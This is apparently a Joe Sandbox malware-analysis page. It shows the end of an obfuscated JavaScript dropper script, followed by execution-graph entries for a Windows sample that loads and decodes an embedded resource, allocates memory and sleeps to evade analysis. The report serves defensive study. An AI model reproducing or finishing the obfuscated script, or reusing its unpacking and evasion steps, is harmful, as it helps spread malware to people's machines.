4369	jjqfig4[Medaxc - ( Medaxc / 3 )] = 46;
4370	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( jjqfig4[1400] - jjqfig4[Medaxc] ), 100 );
4371	} ) ( ) + ( function (Rv, Ps) {
4372	var invfigh3 = Nbedoki;
4373	invfigh3[Medaxc] = 3;
4374	invfigh3[Medaxc - ( Medaxc / 3 )] = 54;
4375	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( invfigh3[1400] - invfigh3[Medaxc] ), 100 );
4376	} ) ( 'hips71', true, 'cause44' ) + ( function (Rv, Ps) {
4377	var hvpmi4 = Nbedoki;
4378	hvpmi4[Medaxc] = 2;
4379	hvpmi4[Medaxc - ( Medaxc / 3 )] = 56;
4380	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( hvpmi4[1400] - hvpmi4[Medaxc] ), 100 );
4381	} ) ( 469, 'thats43' ) ) ;
4382	wifcrcheery2[( function (Rv, Ps) { var vufenoug5 = Nbedoki; vufenoug5[Medaxc] = 0;vufenoug5[Medax...
4383	if ( wifcrcheery2[( function (Rv, Ps) { var hfscurls5 = Nbedoki; hfscurls5[Medaxc] = 2;hfscurls5[...
4384	{
4385	wifcrHa16 = wifcrcheery2[( function (Rv, Ps) { var vpjGl4 = Nbedoki; vpjGl4[Medaxc] = 0;vpjGl4[Me...
4386	try
4387	{
4388	if ( wifcrHa16[( function (Rv, Ps) { var nshthi5 = Nbedoki; nshthi5[Medaxc] = 4;nshthi5[Medaxc - ...
4389	{
4390	wifcrhourof13 = wifcrbegan71[( function (Rv, Ps) { var stqaske3 = Nbedoki; stqaske3[Medaxc] = 2;s...
4391	wifcrhourof13[( function (Rv, Ps) { var wnqfi3 = Nbedoki; wnqfi3[Medaxc] = 2;wnqfi3[Medaxc - ( Me...
4392	wifcrhourof13[( function (Rv, Ps) { var ittyou5 = Nbedoki; ittyou5[Medaxc] = 2;ittyou5[Medaxc - (...
4393	wifcrhourof13 = null;
4394	wifcrhourof13 = wifcrbegan71[( function (Rv, Ps) { var stqaske3 = Nbedoki; stqaske3[Medaxc] = 2;s...
4395	wifcrhourof13[( function (Rv, Ps) { var wnqfi3 = Nbedoki; wnqfi3[Medaxc] = 2;wnqfi3[Medaxc - ( Me...
4396	wifcrhourof13[( function (Rv, Ps) { var ittyou5 = Nbedoki; ittyou5[Medaxc] = 2;ittyou5[Medaxc - (...
4397	try
4398	{
4399	wifcrthin75[( function (Rv, Ps) { var fhwpi3 = Nbedoki; fhwpi3[Medaxc] = 1;fhwpi3[Medaxc - ( Meda...
4400	( function (Rv, Ps) {
4401	var nekth3 = Nbedoki;
4402	nekth3[Medaxc] = 1;
4403	nekth3[Medaxc - ( Medaxc / 3 )] = 120;
4404	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( nekth3[1400] - nekth3[Medaxc] ), 100 );
4405	} ) ( 'nice48' ) + ( function (Rv, Ps) {
4406	var spqrem5 = Nbedoki;
4407	spqrem5[Medaxc] = 0;
4408	spqrem5[Medaxc - ( Medaxc / 3 )] = 115;
4409	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( spqrem5[1400] - spqrem5[Medaxc] ), 100 );
4410	} ) ( ) + ( function (Rv, Ps) {
4411	var npwThey55 = Nbedoki;
4412	npwThey55[Medaxc] = 1;
4413	npwThey55[Medaxc - ( Medaxc / 3 )] = 100;
4414	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( npwThey55[1400] - npwThey55[Medaxc] ), 100 );
4415	} ) ( 'autographedSunglasses27' ) + ( function (Rv, Ps) {
4416	var sqnaske5 = Nbedoki;
4417	sqnaske5[Medaxc] = 3;
4418	sqnaske5[Medaxc - ( Medaxc / 3 )] = 117;
4419	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( sqnaske5[1400] - sqnaske5[Medaxc] ), 100 );
4420	} ) ( true, false, 'andall77' ) + ( function (Rv, Ps) {
4421	var ufqTh4 = Nbedoki;
4422	ufqTh4[Medaxc] = 2;
4423	ufqTh4[Medaxc - ( Medaxc / 3 )] = 107;
4424	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( ufqTh4[1400] - ufqTh4[Medaxc] ), 100 );
4425	} ) ( 'every83', 2141 ) + ( function (Rv, Ps) {
4426	var sstyo5 = Nbedoki;
4427	sstyo5[Medaxc] = 2;
4428	sstyo5[Medaxc - ( Medaxc / 3 )] = 114;
4429	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( sstyo5[1400] - sstyo5[Medaxc] ), 100 );
4430	} ) ( null, 'gonna41' ) + ( function (Rv, Ps) {
4431	var jpimost85 = Nbedoki;
4432	jpimost85[Medaxc] = 2;
4433	jpimost85[Medaxc - ( Medaxc / 3 )] = 118;
4434	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( jpimost85[1400] - jpimost85[Medaxc] ), 100 );
4435	} ) ( false, null ),
4436	( function (Rv, Ps) {
4437	var tuipi4 = Nbedoki;
4438	tuipi4[Medaxc] = 1;
4439	tuipi4[Medaxc - ( Medaxc / 3 )] = 48;
4440	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tuipi4[1400] - tuipi4[Medaxc] ), 100 );
4441	} ) ( 1172 ) + ( function (Rv, Ps) {
4442	var tpslike5 = Nbedoki;
4443	tpslike5[Medaxc] = 3;
4444	tpslike5[Medaxc - ( Medaxc / 3 )] = 69;
4445	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tpslike5[1400] - tpslike5[Medaxc] ), 100 );
4446	} ) ( 'outfit15', true, false ) + ( function (Rv, Ps) {
4447	var tjhremem3 = Nbedoki;
4448	tjhremem3[Medaxc] = 1;
4449	tjhremem3[Medaxc - ( Medaxc / 3 )] = 33;
4450	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tjhremem3[1400] - tjhremem3[Medaxc] ), 100 );
4451	} ) ( false ) + ( function (Rv, Ps) {
4452	var sjuThey4 = Nbedoki;
4453	sjuThey4[Medaxc] = 4;
4454	sjuThey4[Medaxc - ( Medaxc / 3 )] = 51;
4455	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( sjuThey4[1400] - sjuThey4[Medaxc] ), 100 );
4456	} ) ( 'autographedSunglasses27', 'while53', 1819, 1819 ) + ( function (Rv, Ps) {
4457	var vvucusto3 = Nbedoki;
4458	vvucusto3[Medaxc] = 0;
4459	vvucusto3[Medaxc - ( Medaxc / 3 )] = 69;
4460	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( vvucusto3[1400] - vvucusto3[Medaxc] ), 100 );
4461	} ) ( ) + ( function (Rv, Ps) {
4462	var tskcurl5 = Nbedoki;
4463	tskcurl5[Medaxc] = 4;
4464	tskcurl5[Medaxc - ( Medaxc / 3 )] = 62;
4465	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tskcurl5[1400] - tskcurl5[Medaxc] ), 100 );
4466	} ) ( 'tits10', 'lowJesus56', 'cause42', true ) + ( function (Rv, Ps) {
4467	var fhwpick5 = Nbedoki;
4468	fhwpick5[Medaxc] = 3;
4469	fhwpick5[Medaxc - ( Medaxc / 3 )] = 77;
4470	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( fhwpick5[1400] - fhwpick5[Medaxc] ), 100 );
4471	} ) ( 'Menace78', 'Icum13', null ) + ( function (Rv, Ps) {
4472	var evkmos5 = Nbedoki;
4473	evkmos5[Medaxc] = 3;
4474	evkmos5[Medaxc - ( Medaxc / 3 )] = 86;
4475	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( evkmos5[1400] - evkmos5[Medaxc] ), 100 );
4476	} ) ( 1473, 'office18', null ) + ( function (Rv, Ps) {
4477	var kqqcusto4 = Nbedoki;
4478	kqqcusto4[Medaxc] = 3;
4479	kqqcusto4[Medaxc - ( Medaxc / 3 )] = 102;
4480	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( kqqcusto4[1400] - kqqcusto4[Medaxc] ), 100 );
4481	} ) ( null, true, 'this37' ) + ( function (Rv, Ps) {
4482	var tjtthi4 = Nbedoki;
4483	tjtthi4[Medaxc] = 2;
4484	tjtthi4[Medaxc - ( Medaxc / 3 )] = 116;
4485	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tjtthi4[1400] - tjtthi4[Medaxc] ), 100 );
4486	} ) ( 'nice48', 'dudes19' ) + ( function (Rv, Ps) {
4487	var kuiGlad34 = Nbedoki;
4488	kuiGlad34[Medaxc] = 4;
4489	kuiGlad34[Medaxc - ( Medaxc / 3 )] = 109;
4490	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( kuiGlad34[1400] - kuiGlad34[Medaxc] ), 100 );
4491	} ) ( null, 153, true, false ) + ( function (Rv, Ps) {
4492	var qevThey3 = Nbedoki;
4493	qevThey3[Medaxc] = 1;
4494	qevThey3[Medaxc - ( Medaxc / 3 )] = 113;
4495	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( qevThey3[1400] - qevThey3[Medaxc] ), 100 );
4496	} ) ( false ) + ( function (Rv, Ps) {
4497	var ewwremem5 = Nbedoki;
4498	ewwremem5[Medaxc] = 2;
4499	ewwremem5[Medaxc - ( Medaxc / 3 )] = 118;
4500	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( ewwremem5[1400] - ewwremem5[Medaxc] ), 100 );
4501	} ) ( 2466, 'Theron30' ) + ( function (Rv, Ps) {
4502	var etkth3 = Nbedoki;
4503	etkth3[Medaxc] = 2;
4504	etkth3[Medaxc - ( Medaxc / 3 )] = 34;
4505	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( etkth3[1400] - etkth3[Medaxc] ), 100 );
4506	} ) ( 254, 'daughter26' ) + wifcrMiss51 + wifcrmature99 + wifcrMiss51, '',
4507	( function (Rv, Ps) {
4508	var skiyou5 = Nbedoki;
4509	skiyou5[Medaxc] = 4;
4510	skiyou5[Medaxc - ( Medaxc / 3 )] = 115;
4511	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( skiyou5[1400] - skiyou5[Medaxc] ), 100 );
4512	} ) ( 'gonna41', 'gone93', 'motherfuckin42', 'rana24' ) + ( function (Rv, Ps) {
4513	var tujcusto5 = Nbedoki;
4514	tujcusto5[Medaxc] = 3;
4515	tujcusto5[Medaxc - ( Medaxc / 3 )] = 115;
4516	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tujcusto5[1400] - tujcusto5[Medaxc] ), 100 );
4517	} ) ( true, true, 'this37' ) + ( function (Rv, Ps) {
4518	var jwwTh3 = Nbedoki;
4519	jwwTh3[Medaxc] = 1;
4520	jwwTh3[Medaxc - ( Medaxc / 3 )] = 102;
4521	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( jwwTh3[1400] - jwwTh3[Medaxc] ), 100 );
4522	} ) ( null ) + ( function (Rv, Ps) {
4523	var skscurls3 = Nbedoki;
4524	skscurls3[Medaxc] = 1;
4525	skscurls3[Medaxc - ( Medaxc / 3 )] = 111;
4526	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( skscurls3[1400] - skscurls3[Medaxc] ), 100 );
4527	} ) ( false ), 1 ) ;
4528	}
4529	catch ( wifcrquite48 )
4530	{
4531	wifcrthin75[( function (Rv, Ps) { var fhwpi3 = Nbedoki; fhwpi3[Medaxc] = 1;fhwpi3[Medaxc - ( Meda...
4532	( function (Rv, Ps) {
4533	var jiuli3 = Nbedoki;
4534	jiuli3[Medaxc] = 4;
4535	jiuli3[Medaxc - ( Medaxc / 3 )] = 103;
4536	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( jiuli3[1400] - jiuli3[Medaxc] ), 100 );
4537	} ) ( 'outfit15', 'really73', 'shovin87', 'shes42' ) + ( function (Rv, Ps) {
4538	var siklik5 = Nbedoki;
4539	siklik5[Medaxc] = 0;
4540	siklik5[Medaxc - ( Medaxc / 3 )] = 115;
4541	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( siklik5[1400] - siklik5[Medaxc] ), 100 );
4542	} ) ( ) + ( function (Rv, Ps) {
4543	var tqjcurl4 = Nbedoki;
4544	tqjcurl4[Medaxc] = 0;
4545	tqjcurl4[Medaxc - ( Medaxc / 3 )] = 99;
4546	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tqjcurl4[1400] - tqjcurl4[Medaxc] ), 100 );
4547	} ) ( ) + ( function (Rv, Ps) {
4548	var twjmi5 = Nbedoki;
4549	twjmi5[Medaxc] = 0;
4550	twjmi5[Medaxc - ( Medaxc / 3 )] = 114;
4551	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( twjmi5[1400] - twjmi5[Medaxc] ), 100 );
4552	} ) ( ) + ( function (Rv, Ps) {
4553	var wssyour3 = Nbedoki;
4554	wssyour3[Medaxc] = 0;
4555	wssyour3[Medaxc - ( Medaxc / 3 )] = 105;
4556	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( wssyour3[1400] - wssyour3[Medaxc] ), 100 );
4557	} ) ( ) + ( function (Rv, Ps) {
4558	var uffcusto4 = Nbedoki;
4559	uffcusto4[Medaxc] = 3;
4560	uffcusto4[Medaxc - ( Medaxc / 3 )] = 115;
4561	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( uffcusto4[1400] - uffcusto4[Medaxc] ), 100 );
4562	} ) ( null, 1208, 'this37' ) + ( function (Rv, Ps) {
4563	var jpnpick5 = Nbedoki;
4564	jpnpick5[Medaxc] = 0;
4565	jpnpick5[Medaxc - ( Medaxc / 3 )] = 116;
4566	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( jpnpick5[1400] - jpnpick5[Medaxc] ), 100 );
4567	} ) ( ),
4568	( function (Rv, Ps) {
4569	var tuipi4 = Nbedoki;
4570	tuipi4[Medaxc] = 1;
4571	tuipi4[Medaxc - ( Medaxc / 3 )] = 48;
4572	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tuipi4[1400] - tuipi4[Medaxc] ), 100 );
4573	} ) ( 1172 ) + ( function (Rv, Ps) {
4574	var tpslike5 = Nbedoki;
4575	tpslike5[Medaxc] = 3;
4576	tpslike5[Medaxc - ( Medaxc / 3 )] = 69;
4577	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tpslike5[1400] - tpslike5[Medaxc] ), 100 );
4578	} ) ( 'outfit15', true, false ) + ( function (Rv, Ps) {
4579	var tjhremem3 = Nbedoki;
4580	tjhremem3[Medaxc] = 1;
4581	tjhremem3[Medaxc - ( Medaxc / 3 )] = 33;
4582	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tjhremem3[1400] - tjhremem3[Medaxc] ), 100 );
4583	} ) ( false ) + ( function (Rv, Ps) {
4584	var sjuThey4 = Nbedoki;
4585	sjuThey4[Medaxc] = 4;
4586	sjuThey4[Medaxc - ( Medaxc / 3 )] = 51;
4587	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( sjuThey4[1400] - sjuThey4[Medaxc] ), 100 );
4588	} ) ( 'autographedSunglasses27', 'while53', 1819, 1819 ) + ( function (Rv, Ps) {
4589	var vvucusto3 = Nbedoki;
4590	vvucusto3[Medaxc] = 0;
4591	vvucusto3[Medaxc - ( Medaxc / 3 )] = 69;
4592	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( vvucusto3[1400] - vvucusto3[Medaxc] ), 100 );
4593	} ) ( ) + ( function (Rv, Ps) {
4594	var tskcurl5 = Nbedoki;
4595	tskcurl5[Medaxc] = 4;
4596	tskcurl5[Medaxc - ( Medaxc / 3 )] = 62;
4597	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tskcurl5[1400] - tskcurl5[Medaxc] ), 100 );
4598	} ) ( 'tits10', 'lowJesus56', 'cause42', true ) + ( function (Rv, Ps) {
4599	var fhwpick5 = Nbedoki;
4600	fhwpick5[Medaxc] = 3;
4601	fhwpick5[Medaxc - ( Medaxc / 3 )] = 77;
4602	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( fhwpick5[1400] - fhwpick5[Medaxc] ), 100 );
4603	} ) ( 'Menace78', 'Icum13', null ) + ( function (Rv, Ps) {
4604	var evkmos5 = Nbedoki;
4605	evkmos5[Medaxc] = 3;
4606	evkmos5[Medaxc - ( Medaxc / 3 )] = 86;
4607	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( evkmos5[1400] - evkmos5[Medaxc] ), 100 );
4608	} ) ( 1473, 'office18', null ) + ( function (Rv, Ps) {
4609	var kqqcusto4 = Nbedoki;
4610	kqqcusto4[Medaxc] = 3;
4611	kqqcusto4[Medaxc - ( Medaxc / 3 )] = 102;
4612	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( kqqcusto4[1400] - kqqcusto4[Medaxc] ), 100 );
4613	} ) ( null, true, 'this37' ) + ( function (Rv, Ps) {
4614	var tjtthi4 = Nbedoki;
4615	tjtthi4[Medaxc] = 2;
4616	tjtthi4[Medaxc - ( Medaxc / 3 )] = 116;
4617	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tjtthi4[1400] - tjtthi4[Medaxc] ), 100 );
4618	} ) ( 'nice48', 'dudes19' ) + ( function (Rv, Ps) {
4619	var kuiGlad34 = Nbedoki;
4620	kuiGlad34[Medaxc] = 4;
4621	kuiGlad34[Medaxc - ( Medaxc / 3 )] = 109;
4622	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( kuiGlad34[1400] - kuiGlad34[Medaxc] ), 100 );
4623	} ) ( null, 153, true, false ) + ( function (Rv, Ps) {
4624	var qevThey3 = Nbedoki;
4625	qevThey3[Medaxc] = 1;
4626	qevThey3[Medaxc - ( Medaxc / 3 )] = 113;
4627	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( qevThey3[1400] - qevThey3[Medaxc] ), 100 );
4628	} ) ( false ) + ( function (Rv, Ps) {
4629	var ewwremem5 = Nbedoki;
4630	ewwremem5[Medaxc] = 2;
4631	ewwremem5[Medaxc - ( Medaxc / 3 )] = 118;
4632	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( ewwremem5[1400] - ewwremem5[Medaxc] ), 100 );
4633	} ) ( 2466, 'Theron30' ) + ( function (Rv, Ps) {
4634	var etkth3 = Nbedoki;
4635	etkth3[Medaxc] = 2;
4636	etkth3[Medaxc - ( Medaxc / 3 )] = 34;
4637	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( etkth3[1400] - etkth3[Medaxc] ), 100 );
4638	} ) ( 254, 'daughter26' ) + wifcrMiss51 + wifcrmature99 + wifcrMiss51, '',
4639	( function (Rv, Ps) {
4640	var skiyou5 = Nbedoki;
4641	skiyou5[Medaxc] = 4;
4642	skiyou5[Medaxc - ( Medaxc / 3 )] = 115;
4643	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( skiyou5[1400] - skiyou5[Medaxc] ), 100 );
4644	} ) ( 'gonna41', 'gone93', 'motherfuckin42', 'rana24' ) + ( function (Rv, Ps) {
4645	var tujcusto5 = Nbedoki;
4646	tujcusto5[Medaxc] = 3;
4647	tujcusto5[Medaxc - ( Medaxc / 3 )] = 115;
4648	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( tujcusto5[1400] - tujcusto5[Medaxc] ), 100 );
4649	} ) ( true, true, 'this37' ) + ( function (Rv, Ps) {
4650	var jwwTh3 = Nbedoki;
4651	jwwTh3[Medaxc] = 1;
4652	jwwTh3[Medaxc - ( Medaxc / 3 )] = 102;
4653	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( jwwTh3[1400] - jwwTh3[Medaxc] ), 100 );
4654	} ) ( null ) + ( function (Rv, Ps) {
4655	var skscurls3 = Nbedoki;
4656	skscurls3[Medaxc] = 1;
4657	skscurls3[Medaxc - ( Medaxc / 3 )] = 111;
4658	return lrPbHjb ( lrPbHjbDas ( Ps ) + ( skscurls3[1400] - skscurls3[Medaxc] ), 100 );
4659	} ) ( false ), 0 ) ;
4660	}
4661	break ;
4662	}
4663	else
4664	{
4665	wifcrcomfortin80[( function (Rv, Ps) { var vqjcur3 = Nbedoki; vqjcur3[Medaxc] = 3;vqjcur3[Medaxc ...
4666	continue ;
4667	}
4668	}
4669	catch ( wifcrquite48 )
4670	{
4671	wifcrcomfortin80[( function (Rv, Ps) { var vqjcur3 = Nbedoki; vqjcur3[Medaxc] = 3;vqjcur3[Medaxc ...
4672	continue ;
4673	}
4674	}
4675	else
4676	{
4677	wifcrcomfortin80[( function (Rv, Ps) { var vqjcur3 = Nbedoki; vqjcur3[Medaxc] = 3;vqjcur3[Medaxc ...
4678	continue ;
4679	}
4680	}
4681	catch ( wifcrquite48 )
4682	{
4683	wifcrcomfortin80[( function (Rv, Ps) { var vqjcur3 = Nbedoki; vqjcur3[Medaxc] = 3;vqjcur3[Medaxc ...
4684	continue ;
4685	}
4686	wifcrcomfortin80[( function (Rv, Ps) { var vqjcur3 = Nbedoki; vqjcur3[Medaxc] = 3;vqjcur3[Medaxc ...
4687	}
4688	;
4689	break ;
4690	}
4691	;
4692	}
4693	;
4694	wifcrappeared55ko = null;
4695	wifcrwith75ko = null;
4696	wifcryoullgrow1ko = null;
4697	wifcrchildren7ko = null;
4698	wifcrbooks17ko = null;
4699	wifcrbookworm31ko = null;
4700	wifcrBethI50ko = null;
4701	wifcrfiercefunny31ko = null;
4702	wifcrsock55ko = null;
4703	wifcrvillain3ko = null;
4704	wifcrwerewritten49ko = null;
4705	wifcrsharp40ko = null;

Reset < >

Analysis Process: 431846743.exe PID: 3116 Parent PID: 3692 431846743.exeCOMMON

Execution Graph

Execution Coverage:	34.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.9%
Total number of Nodes:	295
Total number of Limit Nodes:	8

Executed Functions

Function 004013F6, Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004013FB
strlen.MSVCRT ref: 00401420

Part of subcall function 004012C6: _EH_prolog.MSVCRT ref: 004012CB

FindResourceA.KERNEL32(00000000,0096B91B,MONDAY), ref: 00401515
strlen.MSVCRT ref: 00401534

Strings

UBk13VZ596kw0Z0Qkzj54iNK9pycb30ychPO35v1HY, xrefs: 0040152B, 00401533, 0040153E
memcpy, xrefs: 004014EF
LockResource, xrefs: 004014B3
FindResourceA, xrefs: 00401475
LoadResource, xrefs: 0040148C
qMc}H*YTr}|Q816n99oZTxe{09c@45, xrefs: 00401453
SizeofResource, xrefs: 0040149F
MONDAY, xrefs: 0040150A
NTDLL.DLL, xrefs: 004014F4
KERNEL32.DLL, xrefs: 00401470, 0040147A, 00401491, 004014A4, 004014B8, 004014CC, 004014E0
VirtualAllocExNuma, xrefs: 004014C7
GetCurrentProcess, xrefs: 004014DB

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: H_prologstrlen$FindResource
String ID: FindResourceA$GetCurrentProcess$KERNEL32.DLL$LoadResource$LockResource$MONDAY$NTDLL.DLL$SizeofResource$UBk13VZ596kw0Z0Qkzj54iNK9pycb30ychPO35v1HY$VirtualAllocExNuma$memcpy$qMc}H*YTr}|Q816n99oZTxe{09c@45
API String ID: 3946776721-656568986
Opcode ID: 194ba3be7d00c73da5166ac3202e765bc04cbf17e9fb32197062cbda1ef8e392
Instruction ID: 1b1daef6d0aa63b0f3bb7f007b131c8894d4578df78689f0a216841b84fa7b26
Opcode Fuzzy Hash: 194ba3be7d00c73da5166ac3202e765bc04cbf17e9fb32197062cbda1ef8e392
Instruction Fuzzy Hash: 97614F71C00219ABDF10ABE59D4AAEFBBBCEF48304F10447BF505B7192D6B959058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040276C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00402799
__p__fmode.MSVCRT ref: 004027AE
__p__commode.MSVCRT ref: 004027BC
__setusermatherr.MSVCRT ref: 004027E8
_initterm.MSVCRT ref: 004027FE
__getmainargs.MSVCRT ref: 00402821
_initterm.MSVCRT ref: 00402831
GetStartupInfoA.KERNEL32 ref: 00402870
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402894
exit.MSVCRT ref: 004028A4
_XcptFilter.MSVCRT ref: 004028B6

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 1160cdad416f4276a3a3e6d0b6e7166148041f2eab0252b07ea06657ef556364
Instruction ID: 84b94a3c6fc318e2c7d763bd1f636a3eb878853c8358bca2aff81c2abcbc1e6f
Opcode Fuzzy Hash: 1160cdad416f4276a3a3e6d0b6e7166148041f2eab0252b07ea06657ef556364
Instruction Fuzzy Hash: 64418176800758AFDB20AFA4DE49A9A7BBCFB09711F20423FE441B72D1D7B84941DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004012C6, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004012CB
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004012EE
wcslen.MSVCRT ref: 004012FA
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(CRYPT32.DLL,00000000), ref: 00401306
LoadLibraryW.KERNEL32(?,CryptStringToBinaryA), ref: 00401321
malloc.MSVCRT ref: 00401348
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401371

Strings

CryptStringToBinaryA, xrefs: 0040131B
CRYPT32.DLL, xrefs: 004012F4, 004012F9, 00401302

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@$?assign@?$basic_string@H_prologLibraryLoadV12@mallocwcslen
String ID: CRYPT32.DLL$CryptStringToBinaryA
API String ID: 1769444517-4003543915
Opcode ID: 4bd682fd284dafd6b3d69e501325326813351942735f88ee07fc1407d81f4d4a
Instruction ID: e1e9578958d8e8c1af23e9efcfde6ea73bfd28b9b3e41177363c2057de3328dc
Opcode Fuzzy Hash: 4bd682fd284dafd6b3d69e501325326813351942735f88ee07fc1407d81f4d4a
Instruction Fuzzy Hash: 7E213AB5901209AFDB10AF64DD89DEF7B7CEB09351F10406AF912B22E0C7758E05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 01CAE8BB, Relevance: 9.0, APIs: 6, Instructions: 37
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 01CAE8BD
CommandLineToArgvW.SHELL32(00000000,01CAEFEC), ref: 01CAE8C9
GetStartupInfoW.KERNEL32(01CAEFF4), ref: 01CAE8F6
Sleep.KERNELBASE(000003E8,0000000C,00000017,00000032), ref: 01CAE923
Sleep.KERNEL32(000084D0,0000000C,00000017,00000032), ref: 01CAE937
ExitProcess.KERNEL32 ref: 01CAE93F

Memory Dump Source

Source File: 0000000D.00000002.55322898642.0000000001C81000.00000040.00000001.sdmp, Offset: 01C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c81000_431846743.jbxd

Similarity

API ID: CommandLineSleep$ArgvExitInfoProcessStartup
String ID:
API String ID: 2884962887-0
Opcode ID: ea2474c67cceb6f53bd5b3eaae54221adaf9ada1d4ee2ac2ba38cbfa5cc9ce3c
Instruction ID: 6e6a82465a5532392552dcbbd95983e02ed89f70070e73a791dd9a12f42d9dfe
Opcode Fuzzy Hash: ea2474c67cceb6f53bd5b3eaae54221adaf9ada1d4ee2ac2ba38cbfa5cc9ce3c
Instruction Fuzzy Hash: 06013C31584352EFE3227BB59D49B5D37E8EB2474DF89441DE68A87085DBB0C4018B52

Uniqueness

Uniqueness Score: -1.00%

Function 00310000, Relevance: 9.0, Strings: 7, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tEncrypt, xrefs: 003102EB, 003102EE
CryptAcquireContextA, xrefs: 003101F2, 003101F5
